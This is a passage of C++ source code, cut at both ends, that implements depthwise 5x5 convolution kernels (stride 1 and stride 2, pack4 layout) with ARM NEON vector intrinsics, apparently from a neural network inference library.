_sum0 = vmlaq_f32(_sum0, _k44, _r44);
float32x4_t _r50 = vld1q_f32(r5);
float32x4_t _r51 = vld1q_f32(r5+4);
float32x4_t _r52 = vld1q_f32(r5+8);
float32x4_t _r53 = vld1q_f32(r5+12);
float32x4_t _r54 = vld1q_f32(r5+16);
_sum1 = vmlaq_f32(_sum1, _k40, _r50);
_sum1 = vmlaq_f32(_sum1, _k41, _r51);
_sum1 = vmlaq_f32(_sum1, _k42, _r52);
_sum1 = vmlaq_f32(_sum1, _k43, _r53);
_sum1 = vmlaq_f32(_sum1, _k44, _r54);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr1, _sum1);
r0 += 4;
r1 += 4;
r2 += 4;
r3 += 4;
r4 += 4;
r5 += 4;
outptr0 += 4;
outptr1 += 4;
}
r0 += 4*4 + w*4;
r1 += 4*4 + w*4;
r2 += 4*4 + w*4;
r3 += 4*4 + w*4;
r4 += 4*4 + w*4;
r5 += 4*4 + w*4;
outptr0 += outw*4;
outptr1 += outw*4;
}
#endif // __aarch64__
for (; i < outh; i++)
{
int j = 0;
for (; j+3 < outw; j+=4)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _sum2 = _bias0;
float32x4_t _sum3 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _r06 = vld1q_f32(r0+24);
float32x4_t _r07 = vld1q_f32(r0+28);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
_sum1 = vmlaq_f32(_sum1, _k00, _r01);
_sum1 = vmlaq_f32(_sum1, _k01, _r02);
_sum1 = vmlaq_f32(_sum1, _k02, _r03);
_sum1 = vmlaq_f32(_sum1, _k03, _r04);
_sum1 = vmlaq_f32(_sum1, _k04, _r05);
_sum2 = vmlaq_f32(_sum2, _k00, _r02);
_sum2 = vmlaq_f32(_sum2, _k01, _r03);
_sum2 = vmlaq_f32(_sum2, _k02, _r04);
_sum2 = vmlaq_f32(_sum2, _k03, _r05);
_sum2 = vmlaq_f32(_sum2, _k04, _r06);
_sum3 = vmlaq_f32(_sum3, _k00, _r03);
_sum3 = vmlaq_f32(_sum3, _k01, _r04);
_sum3 = vmlaq_f32(_sum3, _k02, _r05);
_sum3 = vmlaq_f32(_sum3, _k03, _r06);
_sum3 = vmlaq_f32(_sum3, _k04, _r07);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _r16 = vld1q_f32(r1+24);
float32x4_t _r17 = vld1q_f32(r1+28);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
_sum1 = vmlaq_f32(_sum1, _k10, _r11);
_sum1 = vmlaq_f32(_sum1, _k11, _r12);
_sum1 = vmlaq_f32(_sum1, _k12, _r13);
_sum1 = vmlaq_f32(_sum1, _k13, _r14);
_sum1 = vmlaq_f32(_sum1, _k14, _r15);
_sum2 = vmlaq_f32(_sum2, _k10, _r12);
_sum2 = vmlaq_f32(_sum2, _k11, _r13);
_sum2 = vmlaq_f32(_sum2, _k12, _r14);
_sum2 = vmlaq_f32(_sum2, _k13, _r15);
_sum2 = vmlaq_f32(_sum2, _k14, _r16);
_sum3 = vmlaq_f32(_sum3, _k10, _r13);
_sum3 = vmlaq_f32(_sum3, _k11, _r14);
_sum3 = vmlaq_f32(_sum3, _k12, _r15);
_sum3 = vmlaq_f32(_sum3, _k13, _r16);
_sum3 = vmlaq_f32(_sum3, _k14, _r17);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _r26 = vld1q_f32(r2+24);
float32x4_t _r27 = vld1q_f32(r2+28);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
_sum1 = vmlaq_f32(_sum1, _k20, _r21);
_sum1 = vmlaq_f32(_sum1, _k21, _r22);
_sum1 = vmlaq_f32(_sum1, _k22, _r23);
_sum1 = vmlaq_f32(_sum1, _k23, _r24);
_sum1 = vmlaq_f32(_sum1, _k24, _r25);
_sum2 = vmlaq_f32(_sum2, _k20, _r22);
_sum2 = vmlaq_f32(_sum2, _k21, _r23);
_sum2 = vmlaq_f32(_sum2, _k22, _r24);
_sum2 = vmlaq_f32(_sum2, _k23, _r25);
_sum2 = vmlaq_f32(_sum2, _k24, _r26);
_sum3 = vmlaq_f32(_sum3, _k20, _r23);
_sum3 = vmlaq_f32(_sum3, _k21, _r24);
_sum3 = vmlaq_f32(_sum3, _k22, _r25);
_sum3 = vmlaq_f32(_sum3, _k23, _r26);
_sum3 = vmlaq_f32(_sum3, _k24, _r27);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _r36 = vld1q_f32(r3+24);
float32x4_t _r37 = vld1q_f32(r3+28);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
_sum1 = vmlaq_f32(_sum1, _k30, _r31);
_sum1 = vmlaq_f32(_sum1, _k31, _r32);
_sum1 = vmlaq_f32(_sum1, _k32, _r33);
_sum1 = vmlaq_f32(_sum1, _k33, _r34);
_sum1 = vmlaq_f32(_sum1, _k34, _r35);
_sum2 = vmlaq_f32(_sum2, _k30, _r32);
_sum2 = vmlaq_f32(_sum2, _k31, _r33);
_sum2 = vmlaq_f32(_sum2, _k32, _r34);
_sum2 = vmlaq_f32(_sum2, _k33, _r35);
_sum2 = vmlaq_f32(_sum2, _k34, _r36);
_sum3 = vmlaq_f32(_sum3, _k30, _r33);
_sum3 = vmlaq_f32(_sum3, _k31, _r34);
_sum3 = vmlaq_f32(_sum3, _k32, _r35);
_sum3 = vmlaq_f32(_sum3, _k33, _r36);
_sum3 = vmlaq_f32(_sum3, _k34, _r37);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _r46 = vld1q_f32(r4+24);
float32x4_t _r47 = vld1q_f32(r4+28);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
_sum1 = vmlaq_f32(_sum1, _k40, _r41);
_sum1 = vmlaq_f32(_sum1, _k41, _r42);
_sum1 = vmlaq_f32(_sum1, _k42, _r43);
_sum1 = vmlaq_f32(_sum1, _k43, _r44);
_sum1 = vmlaq_f32(_sum1, _k44, _r45);
_sum2 = vmlaq_f32(_sum2, _k40, _r42);
_sum2 = vmlaq_f32(_sum2, _k41, _r43);
_sum2 = vmlaq_f32(_sum2, _k42, _r44);
_sum2 = vmlaq_f32(_sum2, _k43, _r45);
_sum2 = vmlaq_f32(_sum2, _k44, _r46);
_sum3 = vmlaq_f32(_sum3, _k40, _r43);
_sum3 = vmlaq_f32(_sum3, _k41, _r44);
_sum3 = vmlaq_f32(_sum3, _k42, _r45);
_sum3 = vmlaq_f32(_sum3, _k43, _r46);
_sum3 = vmlaq_f32(_sum3, _k44, _r47);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr0+4, _sum1);
vst1q_f32(outptr0+8, _sum2);
vst1q_f32(outptr0+12, _sum3);
r0 += 16;
r1 += 16;
r2 += 16;
r3 += 16;
r4 += 16;
outptr0 += 16;
}
for (; j+1 < outw; j+=2)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
_sum1 = vmlaq_f32(_sum1, _k00, _r01);
_sum1 = vmlaq_f32(_sum1, _k01, _r02);
_sum1 = vmlaq_f32(_sum1, _k02, _r03);
_sum1 = vmlaq_f32(_sum1, _k03, _r04);
_sum1 = vmlaq_f32(_sum1, _k04, _r05);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
_sum1 = vmlaq_f32(_sum1, _k10, _r11);
_sum1 = vmlaq_f32(_sum1, _k11, _r12);
_sum1 = vmlaq_f32(_sum1, _k12, _r13);
_sum1 = vmlaq_f32(_sum1, _k13, _r14);
_sum1 = vmlaq_f32(_sum1, _k14, _r15);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
_sum1 = vmlaq_f32(_sum1, _k20, _r21);
_sum1 = vmlaq_f32(_sum1, _k21, _r22);
_sum1 = vmlaq_f32(_sum1, _k22, _r23);
_sum1 = vmlaq_f32(_sum1, _k23, _r24);
_sum1 = vmlaq_f32(_sum1, _k24, _r25);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
_sum1 = vmlaq_f32(_sum1, _k30, _r31);
_sum1 = vmlaq_f32(_sum1, _k31, _r32);
_sum1 = vmlaq_f32(_sum1, _k32, _r33);
_sum1 = vmlaq_f32(_sum1, _k33, _r34);
_sum1 = vmlaq_f32(_sum1, _k34, _r35);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _r45 = vld1q_f32(r4+20);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
_sum1 = vmlaq_f32(_sum1, _k40, _r41);
_sum1 = vmlaq_f32(_sum1, _k41, _r42);
_sum1 = vmlaq_f32(_sum1, _k42, _r43);
_sum1 = vmlaq_f32(_sum1, _k43, _r44);
_sum1 = vmlaq_f32(_sum1, _k44, _r45);
vst1q_f32(outptr0, _sum0);
vst1q_f32(outptr0+4, _sum1);
r0 += 8;
r1 += 8;
r2 += 8;
r3 += 8;
r4 += 8;
outptr0 += 8;
}
for (; j < outw; j++)
{
float32x4_t _sum0 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
float32x4_t _r43 = vld1q_f32(r4+12);
float32x4_t _r44 = vld1q_f32(r4+16);
float32x4_t _k40 = vld1q_f32(k0);
float32x4_t _k41 = vld1q_f32(k0+4);
float32x4_t _k42 = vld1q_f32(k0+8);
float32x4_t _k43 = vld1q_f32(k0+12);
float32x4_t _k44 = vld1q_f32(k0+16);
k0 -= 80;
_sum0 = vmlaq_f32(_sum0, _k40, _r40);
_sum0 = vmlaq_f32(_sum0, _k41, _r41);
_sum0 = vmlaq_f32(_sum0, _k42, _r42);
_sum0 = vmlaq_f32(_sum0, _k43, _r43);
_sum0 = vmlaq_f32(_sum0, _k44, _r44);
vst1q_f32(outptr0, _sum0);
r0 += 4;
r1 += 4;
r2 += 4;
r3 += 4;
r4 += 4;
outptr0 += 4;
}
r0 += 4*4;
r1 += 4*4;
r2 += 4*4;
r3 += 4*4;
r4 += 4*4;
}
}
}
static void convdw5x5s2_pack4_neon(const Mat& bottom_blob, Mat& top_blob, const Mat& kernel, const Mat& _bias, const Option& opt)
{
int w = bottom_blob.w;
int outw = top_blob.w;
int outh = top_blob.h;
const int group = bottom_blob.c;
const int tailstep = (w - 2*outw + w) * 4;
const float* bias = _bias;
#pragma omp parallel for num_threads(opt.num_threads)
for (int g=0; g<group; g++)
{
Mat out = top_blob.channel(g);
float32x4_t _bias0 = bias ? vld1q_f32((const float*)bias + g * 4) : vdupq_n_f32(0.f);
const float* k0 = kernel.row(g);
float* outptr0 = out;
const Mat img0 = bottom_blob.channel(g);
const float* r0 = img0.row(0);
const float* r1 = img0.row(1);
const float* r2 = img0.row(2);
const float* r3 = img0.row(3);
const float* r4 = img0.row(4);
int i = 0;
for (; i < outh; i++)
{
int j = 0;
for (; j+3 < outw; j+=4)
{
float32x4_t _sum0 = _bias0;
float32x4_t _sum1 = _bias0;
float32x4_t _sum2 = _bias0;
float32x4_t _sum3 = _bias0;
float32x4_t _r00 = vld1q_f32(r0);
float32x4_t _r01 = vld1q_f32(r0+4);
float32x4_t _r02 = vld1q_f32(r0+8);
float32x4_t _r03 = vld1q_f32(r0+12);
float32x4_t _r04 = vld1q_f32(r0+16);
float32x4_t _r05 = vld1q_f32(r0+20);
float32x4_t _r06 = vld1q_f32(r0+24);
float32x4_t _r07 = vld1q_f32(r0+28);
float32x4_t _r08 = vld1q_f32(r0+32);
float32x4_t _r09 = vld1q_f32(r0+36);
float32x4_t _r010 = vld1q_f32(r0+40);
float32x4_t _k00 = vld1q_f32(k0);
float32x4_t _k01 = vld1q_f32(k0+4);
float32x4_t _k02 = vld1q_f32(k0+8);
float32x4_t _k03 = vld1q_f32(k0+12);
float32x4_t _k04 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k00, _r00);
_sum0 = vmlaq_f32(_sum0, _k01, _r01);
_sum0 = vmlaq_f32(_sum0, _k02, _r02);
_sum0 = vmlaq_f32(_sum0, _k03, _r03);
_sum0 = vmlaq_f32(_sum0, _k04, _r04);
_sum1 = vmlaq_f32(_sum1, _k00, _r02);
_sum1 = vmlaq_f32(_sum1, _k01, _r03);
_sum1 = vmlaq_f32(_sum1, _k02, _r04);
_sum1 = vmlaq_f32(_sum1, _k03, _r05);
_sum1 = vmlaq_f32(_sum1, _k04, _r06);
_sum2 = vmlaq_f32(_sum2, _k00, _r04);
_sum2 = vmlaq_f32(_sum2, _k01, _r05);
_sum2 = vmlaq_f32(_sum2, _k02, _r06);
_sum2 = vmlaq_f32(_sum2, _k03, _r07);
_sum2 = vmlaq_f32(_sum2, _k04, _r08);
_sum3 = vmlaq_f32(_sum3, _k00, _r06);
_sum3 = vmlaq_f32(_sum3, _k01, _r07);
_sum3 = vmlaq_f32(_sum3, _k02, _r08);
_sum3 = vmlaq_f32(_sum3, _k03, _r09);
_sum3 = vmlaq_f32(_sum3, _k04, _r010);
float32x4_t _r10 = vld1q_f32(r1);
float32x4_t _r11 = vld1q_f32(r1+4);
float32x4_t _r12 = vld1q_f32(r1+8);
float32x4_t _r13 = vld1q_f32(r1+12);
float32x4_t _r14 = vld1q_f32(r1+16);
float32x4_t _r15 = vld1q_f32(r1+20);
float32x4_t _r16 = vld1q_f32(r1+24);
float32x4_t _r17 = vld1q_f32(r1+28);
float32x4_t _r18 = vld1q_f32(r1+32);
float32x4_t _r19 = vld1q_f32(r1+36);
float32x4_t _r110 = vld1q_f32(r1+40);
float32x4_t _k10 = vld1q_f32(k0);
float32x4_t _k11 = vld1q_f32(k0+4);
float32x4_t _k12 = vld1q_f32(k0+8);
float32x4_t _k13 = vld1q_f32(k0+12);
float32x4_t _k14 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k10, _r10);
_sum0 = vmlaq_f32(_sum0, _k11, _r11);
_sum0 = vmlaq_f32(_sum0, _k12, _r12);
_sum0 = vmlaq_f32(_sum0, _k13, _r13);
_sum0 = vmlaq_f32(_sum0, _k14, _r14);
_sum1 = vmlaq_f32(_sum1, _k10, _r12);
_sum1 = vmlaq_f32(_sum1, _k11, _r13);
_sum1 = vmlaq_f32(_sum1, _k12, _r14);
_sum1 = vmlaq_f32(_sum1, _k13, _r15);
_sum1 = vmlaq_f32(_sum1, _k14, _r16);
_sum2 = vmlaq_f32(_sum2, _k10, _r14);
_sum2 = vmlaq_f32(_sum2, _k11, _r15);
_sum2 = vmlaq_f32(_sum2, _k12, _r16);
_sum2 = vmlaq_f32(_sum2, _k13, _r17);
_sum2 = vmlaq_f32(_sum2, _k14, _r18);
_sum3 = vmlaq_f32(_sum3, _k10, _r16);
_sum3 = vmlaq_f32(_sum3, _k11, _r17);
_sum3 = vmlaq_f32(_sum3, _k12, _r18);
_sum3 = vmlaq_f32(_sum3, _k13, _r19);
_sum3 = vmlaq_f32(_sum3, _k14, _r110);
float32x4_t _r20 = vld1q_f32(r2);
float32x4_t _r21 = vld1q_f32(r2+4);
float32x4_t _r22 = vld1q_f32(r2+8);
float32x4_t _r23 = vld1q_f32(r2+12);
float32x4_t _r24 = vld1q_f32(r2+16);
float32x4_t _r25 = vld1q_f32(r2+20);
float32x4_t _r26 = vld1q_f32(r2+24);
float32x4_t _r27 = vld1q_f32(r2+28);
float32x4_t _r28 = vld1q_f32(r2+32);
float32x4_t _r29 = vld1q_f32(r2+36);
float32x4_t _r210 = vld1q_f32(r2+40);
float32x4_t _k20 = vld1q_f32(k0);
float32x4_t _k21 = vld1q_f32(k0+4);
float32x4_t _k22 = vld1q_f32(k0+8);
float32x4_t _k23 = vld1q_f32(k0+12);
float32x4_t _k24 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k20, _r20);
_sum0 = vmlaq_f32(_sum0, _k21, _r21);
_sum0 = vmlaq_f32(_sum0, _k22, _r22);
_sum0 = vmlaq_f32(_sum0, _k23, _r23);
_sum0 = vmlaq_f32(_sum0, _k24, _r24);
_sum1 = vmlaq_f32(_sum1, _k20, _r22);
_sum1 = vmlaq_f32(_sum1, _k21, _r23);
_sum1 = vmlaq_f32(_sum1, _k22, _r24);
_sum1 = vmlaq_f32(_sum1, _k23, _r25);
_sum1 = vmlaq_f32(_sum1, _k24, _r26);
_sum2 = vmlaq_f32(_sum2, _k20, _r24);
_sum2 = vmlaq_f32(_sum2, _k21, _r25);
_sum2 = vmlaq_f32(_sum2, _k22, _r26);
_sum2 = vmlaq_f32(_sum2, _k23, _r27);
_sum2 = vmlaq_f32(_sum2, _k24, _r28);
_sum3 = vmlaq_f32(_sum3, _k20, _r26);
_sum3 = vmlaq_f32(_sum3, _k21, _r27);
_sum3 = vmlaq_f32(_sum3, _k22, _r28);
_sum3 = vmlaq_f32(_sum3, _k23, _r29);
_sum3 = vmlaq_f32(_sum3, _k24, _r210);
float32x4_t _r30 = vld1q_f32(r3);
float32x4_t _r31 = vld1q_f32(r3+4);
float32x4_t _r32 = vld1q_f32(r3+8);
float32x4_t _r33 = vld1q_f32(r3+12);
float32x4_t _r34 = vld1q_f32(r3+16);
float32x4_t _r35 = vld1q_f32(r3+20);
float32x4_t _r36 = vld1q_f32(r3+24);
float32x4_t _r37 = vld1q_f32(r3+28);
float32x4_t _r38 = vld1q_f32(r3+32);
float32x4_t _r39 = vld1q_f32(r3+36);
float32x4_t _r310 = vld1q_f32(r3+40);
float32x4_t _k30 = vld1q_f32(k0);
float32x4_t _k31 = vld1q_f32(k0+4);
float32x4_t _k32 = vld1q_f32(k0+8);
float32x4_t _k33 = vld1q_f32(k0+12);
float32x4_t _k34 = vld1q_f32(k0+16);
k0 += 20;
_sum0 = vmlaq_f32(_sum0, _k30, _r30);
_sum0 = vmlaq_f32(_sum0, _k31, _r31);
_sum0 = vmlaq_f32(_sum0, _k32, _r32);
_sum0 = vmlaq_f32(_sum0, _k33, _r33);
_sum0 = vmlaq_f32(_sum0, _k34, _r34);
_sum1 = vmlaq_f32(_sum1, _k30, _r32);
_sum1 = vmlaq_f32(_sum1, _k31, _r33);
_sum1 = vmlaq_f32(_sum1, _k32, _r34);
_sum1 = vmlaq_f32(_sum1, _k33, _r35);
_sum1 = vmlaq_f32(_sum1, _k34, _r36);
_sum2 = vmlaq_f32(_sum2, _k30, _r34);
_sum2 = vmlaq_f32(_sum2, _k31, _r35);
_sum2 = vmlaq_f32(_sum2, _k32, _r36);
_sum2 = vmlaq_f32(_sum2, _k33, _r37);
_sum2 = vmlaq_f32(_sum2, _k34, _r38);
_sum3 = vmlaq_f32(_sum3, _k30, _r36);
_sum3 = vmlaq_f32(_sum3, _k31, _r37);
_sum3 = vmlaq_f32(_sum3, _k32, _r38);
_sum3 = vmlaq_f32(_sum3, _k33, _r39);
_sum3 = vmlaq_f32(_sum3, _k34, _r310);
float32x4_t _r40 = vld1q_f32(r4);
float32x4_t _r41 = vld1q_f32(r4+4);
float32x4_t _r42 = vld1q_f32(r4+8);
